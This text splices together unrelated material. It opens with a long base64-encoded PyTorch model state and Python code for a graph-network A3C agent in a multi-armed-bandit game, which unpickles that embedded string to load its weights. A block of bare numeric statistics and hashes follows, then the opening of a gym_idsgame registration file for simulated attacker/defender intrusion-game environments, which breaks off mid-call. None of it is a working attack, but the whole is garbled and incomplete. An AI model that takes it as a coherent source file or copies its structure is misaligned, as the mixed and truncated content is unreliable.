V+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAByFQEAAIVyFgEAAFJyFwEAAEsAS2RLZIZyGAEAAEtkSwGGchkBAACJaAIpUnIaAQAAdHIbAQAAUnIcAQAAWCAAAABjcml0aWMudHJhbnNmb3JtX2ZlYXR1cmVzLndlaWdodHIdAQAAaAUoaAZCOwEAAIACigps/JxG+SBqqFAZLoACTekDLoACfXEAKFgQAAAAcHJvdG9jb2xfdmVyc2lvbnEBTekDWA0AAABsaXR0bGVfZW5kaWFucQKIWAoAAAB0eXBlX3NpemVzcQN9cQQoWAUAAABzaG9ydHEFSwJYAwAAAGludHEGSwRYBAAAAGxvbmdxB0sEdXUugAIoWAcAAABzdG9yYWdlcQBjdG9yY2gKRmxvYXRTdG9yYWdlCnEBWA4AAAA5NDQwNTMyMzQwMTYzMnECWAMAAABjcHVxA0sQTnRxBFEugAJdcQBYDgAAADk0NDA1MzIzNDAxNjMycQFhLhAAAAAAAAAA9ULJPRnSvTw3R6e+0c7IvGDYrjxywxY9UcqKvJZtlj+08zc+lqZoP3RC3r0iLs08epWBvReCZ76wrIM5COfFPnIeAQAAhXIfAQAAUnIgAQAASwBLAUsQhnIhAQAASxBLAYZyIgEAAIloAilSciMBAAB0ciQBAABSciUBAABYHgAAAGNyaXRpYy50cmFuc2Zvcm1fZmVhdHVyZXMuYmlhc3ImAQAAaAUoaAZD/4ACigps/JxG+SBqqFAZLoACTekDLoACfXEAKFgQAAAAcHJvdG9jb2xfdmVyc2lvbnEBTekDWA0AAABsaXR0bGVfZW5kaWFucQKIWAoAAAB0eXBlX3NpemVzcQN9cQQoWAUAAABzaG9ydHEFSwJYAwAAAGludHEGSwRYBAAAAGxvbmdxB0sEdXUugAIoWAcAAABzdG9yYWdlcQBjdG9yY2gKRmxvYXRTdG9yYWdlCnEBWA4AAAA5NDQwNTMyNTE1OTU4NHECWAMAAABjcHVxA0sBTnRxBFEugAJdcQBYDgAAADk0NDA1MzI1MTU5NTg0cQFhLgEAAAAAAAAAyLMDP3InAQAAhXIoAQAAUnIpAQAASwBLAYVyKgEAAEsBhXIrAQAAiWgCKVJyLAEAAHRyLQEAAFJyLgEAAFggAAAAY3JpdGljLnJlY29tYmluZV9mZWF0dXJlcy53ZWlnaHRyLwEAAGgFKGgGQgMBAACAAooKbPycRvkgaqhQGS6AAk3pAy6AAn1xAChYEAAAAHByb3RvY29sX3ZlcnNpb25xAU3pA1gNAAAAbGl0dGxlX2VuZGlhbnECiFgKAAAAdHlwZV9zaXplc3EDfXEEKFgFAAAAc2hvcnRxBUsCWAMAAABpbnRxBksEWAQAAABsb25ncQdLBHV1LoACKFgHAAAAc3RvcmFnZXEAY3RvcmNoCkZsb2F0U3RvcmFnZQpxAVgOAAAAOTQ0MDUzMTk0NzIxOTJxAlgDAAAAY3B1cQNLAk50cQRRLoACXXEAWA4AAAA5NDQwNTMxOTQ3MjE5MnEBYS4CAAAAAAAAAAA7cz7fBp6+cjABAACFcjEBAABScjIBAABLAEsBSwKGcjMBAABLAksBhnI0AQAAiWgCKVJyNQEAAHRyNgEAAFJyNwEAAFgeAAAAY3JpdGljLnJlY29tYmluZV9mZWF0dXJlcy5iaWFzcjgBAABoBShoBkP/gAKKCmz8nEb5IGqoUBkugAJN6QMugAJ9cQAoWBAAAABwcm90b2NvbF92ZXJzaW9ucQFN6QNYDQAAAGxpdHRsZV9lbmRpYW5xAohYCgAAAHR5cGVfc2l6ZXNxA31xBChYBQAAAHNob3J0cQVLAlgDAAAAaW50cQZLBFgEAAAAbG9uZ3EHSwR1dS6AAihYBwAAAHN0b3JhZ2VxAGN0b3JjaApGbG9hdFN0b3JhZ2UKcQFYDgAAADk0NDA1MzE4NjcxMjgwcQJYAwAAAGNwdXEDSwFOdHEEUS6AAl1xAFgOAAAAOTQ0MDUzMTg2NzEyODBxAWEuAQAAAAAAAAC6lfY8cjkBAACFcjoBAABScjsBAABLAEsBhXI8AQAASwGFcj0BAACJaAIpUnI+AQAAdHI/AQAAUnJAAQAAdX1yQQEAAFgJAAAAX21ldGFkYXRhckIBAABoAilSckMBAAAoWAAAAAByRAEAAH1yRQEAAFgHAAAAdmVyc2lvbnJGAQAASwFzWAQAAABiYXNlckcBAAB9ckgBAABqRgEAAEsBc1gLAAAAYmFzZS5sYXllcnNySQEAAH1ySgEAAGpGAQAASwFzWA0AAABiYXNlLmxheWVycy4wcksBAAB9ckwBAABqRgEAAEsBc1gdAAAAYmFzZS5sYXllcnMuMC5hY3RpdmF0aW9uX2Z1bmNyTQEAAH1yTgEAAGpGAQAASwFzWCAAAABiYXNlLmxheWVycy4wLnRyYW5zZm9ybV9mZWF0dXJlc3JPAQAAfXJQAQAAakYBAABLAXNYIAAAAGJhc2UubGF5ZXJzLjAucmVjb21iaW5lX2ZlYXR1cmVzclEBAAB9clIBAABqRgEAAEsBc1gNAAAAYmFzZS5sYXllcnMuMXJTAQAAfXJUAQAAakYBAABLAXNYHQAAAGJhc2UubGF5ZXJzLjEuYWN0aXZhdGlvbl9mdW5jclUBAAB9clYBAABqRgEAAEsBc1ggAAAAYmFzZS5sYXllcnMuMS50cmFuc2Zvcm1fZmVhdHVyZXNyVwEAAH1yWAEAAGpGAQAASwFzWCAAAABiYXNlLmxheWVycy4xLnJlY29tYmluZV9mZWF0dXJlc3JZAQAAfXJaAQAAakYBAABLAXNYDQAAAGJhc2UubGF5ZXJzLjJyWwEAAH1yXAEAAGpGAQAASwFzWB0AAABiYXNlLmxheWVycy4yLmFjdGl2YXRpb25fZnVuY3JdAQAAfXJeAQAAakYBAABLAXNYIAAAAGJhc2UubGF5ZXJzLjIudHJhbnNmb3JtX2ZlYXR1cmVzcl8BAAB9cmABAABqRgEAAEsBc1ggAAAAYmFzZS5sYXllcnMuMi5yZWNvbWJpbmVfZmVhdHVyZXNyYQEAAH1yYgEAAGpGAQAASwFzWA0AAABiYXNlLmxheWVycy4zcmMBAAB9cmQBAABqRgEAAEsBc1gdAAAAYmFzZS5sYXllcnMuMy5hY3RpdmF0aW9uX2Z1bmNyZQEAAH1yZgEAAGpGAQAASwFzWCAAAABiYXNlLmxheWVycy4zLnRyYW5zZm9ybV9mZWF0dXJlc3JnAQAAfXJoAQAAakYBAABLAXNYIAAAAGJhc2UubGF5ZXJzLjMucmVjb21iaW5lX2ZlYXR1cmVzcmkBAAB9cmoBAABqRgEAAEsBc1gNAAAAYmFzZS5sYXllcnMuNHJrAQAAfXJsAQAAakYBAABLAXNYHQAAAGJhc2UubGF5ZXJzLjQuYWN0aXZhdGlvbl9mdW5jcm0BAAB9cm4BAABqRgEAAEsBc1ggAAAAYmFzZS5sYXllcnMuNC50cmFuc2Zvcm1fZmVhdHVyZXNybwEAAH1ycAEAAGpGAQAASwFzWCAAAABiYXNlLmxheWVycy40LnJlY29tYmluZV9mZWF0dXJlc3JxAQAAfXJyAQAAakYBAABLAXNYBQAAAGFjdG9ycnMBAAB9cnQBAABqRgEAAEsBc1gVAAAAYWN0b3IuYWN0aXZhdGlvbl9mdW5jcnUBAAB9cnYBAABqRgEAAEsBc1gYAAAAYWN0b3IudHJhbnNmb3JtX2ZlYXR1cmVzcncBAAB9cngBAABqRgEAAEsBc1gYAAAAYWN0b3IucmVjb21iaW5lX2ZlYXR1cmVzcnkBAAB9cnoBAABqRgEAAEsBc1gGAAAAY3JpdGljcnsBAAB9cnwBAABqRgEAAEsBc1gWAAAAY3JpdGljLmFjdGl2YXRpb25fZnVuY3J9AQAAfXJ+AQAAakYBAABLAXNYGQAAAGNyaXRpYy50cmFuc2Zvcm1fZmVhdHVyZXNyfwEAAH1ygAEAAGpGAQAASwFzWBkAAABjcml0aWMucmVjb21iaW5lX2ZlYXR1cmVzcoEBAAB9coIBAABqRgEAAEsBc3VzYnMu' import base64 import pickle import torch from torch import distributions, nn import torch.nn.functional as F class FullyConnectedGNNLayer(nn.Module): def __init__(self, n_nodes, in_features, out_features, activation_func=nn.ReLU(), squeeze_out=False): super().__init__() self.n_nodes = n_nodes self.activation_func = activation_func self.transform_features = nn.Linear(in_features, out_features) self.message_passing_mat = nn.Parameter( (torch.ones((n_nodes, n_nodes)) - torch.eye(n_nodes)) / (n_nodes - 1), requires_grad=False ) self.recombine_features = nn.Linear(out_features*2, out_features) self.squeeze_out = squeeze_out # Initialize linear layer weights nn.init.normal_(self.transform_features.weight, mean=0., std=0.2) nn.init.normal_(self.recombine_features.weight, mean=0., std=0.2) nn.init.constant_(self.transform_features.bias, 0.) nn.init.constant_(self.recombine_features.bias, 0.) def forward(self, features): features_transformed = self.activation_func( self.transform_features(features) ) messages = torch.matmul(self.message_passing_mat, features_transformed) features_messages_combined = self.activation_func( self.recombine_features(torch.cat([features_transformed, messages], dim=-1)) ) if self.squeeze_out: return features_messages_combined.squeeze(dim=-1) else: return features_messages_combined class GraphNN_Residual_Base(nn.Module): def __init__(self, layers, skip_connection_n): super().__init__() assert skip_connection_n >= 1 self.layers = nn.ModuleList(layers) self.skip_connection_n = skip_connection_n def forward(self, x): identity = None for layer_num, layer in enumerate(self.layers): if (len(self.layers) - layer_num - 1) % self.skip_connection_n == 0: x = layer(x) if identity is not None: x += identity identity = x else: x = layer(x) return x class GraphNN_A3C(nn.Module): def __init__(self, in_features, n_nodes, n_hidden_layers, layer_sizes, activation_func = nn.ReLU(), skip_connection_n=2): super().__init__() # Define network if type(layer_sizes) == int: layer_sizes = [layer_sizes] * (n_hidden_layers + 1) assert len(layer_sizes) == n_hidden_layers + 1, f'len(layer_sizes) must equal n_hidden_layers + 1, was {len(layer_sizes)} but should have been {n_hidden_layers+1}' layers = [FullyConnectedGNNLayer(n_nodes, in_features, layer_sizes[0], activation_func=activation_func)] for i in range(n_hidden_layers): layers.append(FullyConnectedGNNLayer(n_nodes, layer_sizes[i], layer_sizes[i+1], activation_func=activation_func)) if skip_connection_n == 0: self.base = nn.Sequential(*layers) else: self.base = GraphNN_Residual_Base(layers, skip_connection_n) self.actor = FullyConnectedGNNLayer(n_nodes, layer_sizes[-1], 1, activation_func=nn.Identity(), squeeze_out=True) self.critic = FullyConnectedGNNLayer(n_nodes, layer_sizes[-1], 1, activation_func=nn.Identity(), squeeze_out=True) def forward(self, states): base_out = self.base(states) return self.actor(base_out), self.critic(base_out).mean(dim=-1) def sample_action(self, states): with torch.no_grad(): logits, _ = self.forward(states) probs = F.softmax(logits, dim=-1) batch_size, n_envs, n_players, n_bandits = probs.shape m = distributions.Categorical(probs.view(batch_size * n_envs * n_players, n_bandits)) return m.sample().view(batch_size, n_envs, n_players) def choose_best_action(self, states): with torch.no_grad(): logits, _ = self.forward(states) return logits.argmax(dim=-1) def loss_func(self, states, actions, v_t): #print(f'states.shape: {states.shape}, actions.shape: {actions.shape}, v_t.shape: {v_t.shape}') logits, values = self.forward(states) #print(f'logits.shape: {logits.shape}, values.shape: {values.shape}') td = v_t - values #critic_loss = td.pow(2).view(-1) # Huber loss critic_loss = F.smooth_l1_loss(v_t, values, reduction='none').view(-1) probs = F.softmax(logits, dim=-1) batch_size, n_envs, n_players, n_bandits = probs.shape m = distributions.Categorical(probs.view(batch_size * n_envs * n_players, n_bandits)) #print(f'm.log_prob(actions.view(batch_size * n_envs * n_players)).shape: {m.log_prob(actions.view(batch_size * n_envs * n_players)).shape}, td.shape: {td.shape}') actor_loss = -(m.log_prob(actions.view(-1)) * td.detach().view(-1)) total_loss = (critic_loss + actor_loss).mean() return total_loss class A3C_Agent(): def __init__(self, configuration, serialized_string): self.n_bandits = configuration.banditCount self.n_steps = 1999 # TODO: Get this info from configuration somehow? self.total_reward = 0 self.pull_rewards = torch.zeros((self.n_bandits, 1), dtype=torch.float) self.player_n_pulls = torch.zeros((self.n_bandits, 2), dtype=torch.float) state_dict_bytes = base64.b64decode(serialized_string) state_dicts = pickle.loads(state_dict_bytes) self.model = GraphNN_A3C( in_features=3, n_nodes=100, n_hidden_layers=4, layer_sizes=16, skip_connection_n=1 ) self.model.load_state_dict(state_dicts['model_state_dict']) self.model.eval() def get_obs(self): # Obs must be of shape (n_batches, n_envs, n_players, n_bandits, n_features # Since we are only selecting an action for a single agent, this translates to: (1, 1, 1, n_bandits, -1) return torch.cat([ self.player_n_pulls, self.pull_rewards ], dim=-1).view(1, 1, 1, self.n_bandits, -1) * self.n_bandits / self.n_steps def get_action(self, observation): if observation.step > 0: # Get r r = observation.reward - self.total_reward self.total_reward = observation.reward # Update pull_rewards and player_n_pulls opp_last_act = observation.lastActions[not observation.agentIndex] self.pull_rewards[self.last_act] += r self.player_n_pulls[self.last_act, 0] += 1 self.player_n_pulls[opp_last_act, 1] += 1 self.last_act = self.model.choose_best_action(self.get_obs()).item() return self.last_act curr_agent = None def agent(observation, configuration): global curr_agent if curr_agent is None: curr_agent = A3C_Agent(configuration, serialized_string) return curr_agent.get_action(observation)
2,451.532164
412,003
0.935474
25,314
419,212
15.481433
0.056767
1.662222
2.413759
3.112246
0.896052
0.895266
0.894978
0.894911
0.894911
0.894758
0
0.179871
0.004415
419,212
170
412,004
2,465.952941
0.759117
0.001629
0
0.138462
0
0.015385
0.984698
0.984383
0
1
0
0.005882
0.015385
1
0.1
false
0.015385
0.038462
0.007692
0.246154
0
0
0
1
null
1
1
1
1
1
1
1
1
1
0
0
0
0
0
1
1
0
0
0
0
0
0
1
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
15
ce2f49e195238d794195159c311941a5c13d3f91
67,081
py
Python
gym_idsgame/__init__.py
lrakotoarivony/gym-idsgame
b5eb2583e87dc37ac1735d28b97241fd51199374
[ "MIT" ]
null
null
null
gym_idsgame/__init__.py
lrakotoarivony/gym-idsgame
b5eb2583e87dc37ac1735d28b97241fd51199374
[ "MIT" ]
null
null
null
gym_idsgame/__init__.py
lrakotoarivony/gym-idsgame
b5eb2583e87dc37ac1735d28b97241fd51199374
[ "MIT" ]
1
2022-01-11T13:25:16.000Z
2022-01-11T13:25:16.000Z
""" Register OpenAI Envs """ from gym.envs.registration import register # -------- Cyber Version ------------ register( id='idsgame-cyber-v0', entry_point='gym_idsgame.envs:IdsGameCyberEnv', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 0 ------------ # [AttackerEnv] 1 layer, 1 server per layer, 10 attack-defense-values, random defender # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0 # [Rewards] Sparse # [Version] 0 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v0', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV0Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 1 layer, 1 server per layer, 10 attack-defense-values, defender following the "defend minimal strategy" # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0 # [Rewards] Sparse # [Version] 0 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v0', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV0Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values, random attacker # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0 # [Rewards] Sparse # [Version] 0 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v0', entry_point='gym_idsgame.envs:IdsGameRandomAttackV0Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values, attacker following the "attack maximal strategy" # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0 # [Rewards] Sparse # [Version] 0 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v0', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV0Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0 # [Rewards] Sparse # [Version] 0 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v0', entry_point='gym_idsgame.envs:IdsGameV0Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 1 ------------ # [AttackerEnv] 1 layer, 1 server per layer, 10 attack-defense-values, random defender # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 1 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v1', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV1Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 1 layer, 1 server per layer, 10 attack-defense-values, defender following the "defend minimal strategy" # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 1 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v1', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV1Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values, random attacker # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 1 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v1', entry_point='gym_idsgame.envs:IdsGameRandomAttackV1Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values, attacker following the "attack maximal strategy" # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 1 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v1', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV1Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 1 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v1', entry_point='gym_idsgame.envs:IdsGameV1Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 2 ------------ # [AttackerEnv] 1 layer, 2 servers per layer, 10 attack-defense-values, random defender # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 2 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v2', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV2Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 1 layer, 2 servers per layer, 10 attack-defense-values, defender following the "defend minimal strategy" # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 2 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v2', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV2Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 2 servers per layer, 10 attack-defense-values, random attacker # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 2 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v2', entry_point='gym_idsgame.envs:IdsGameRandomAttackV2Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 2 servers per layer, 10 attack-defense-values, attacker following the "attack maximal strategy" # [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0 # [Rewards] Sparse # [Version] 2 # [Observations] partially observed # [Environment] Deterministic # [Attacker Starting Position] Start node # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v2', 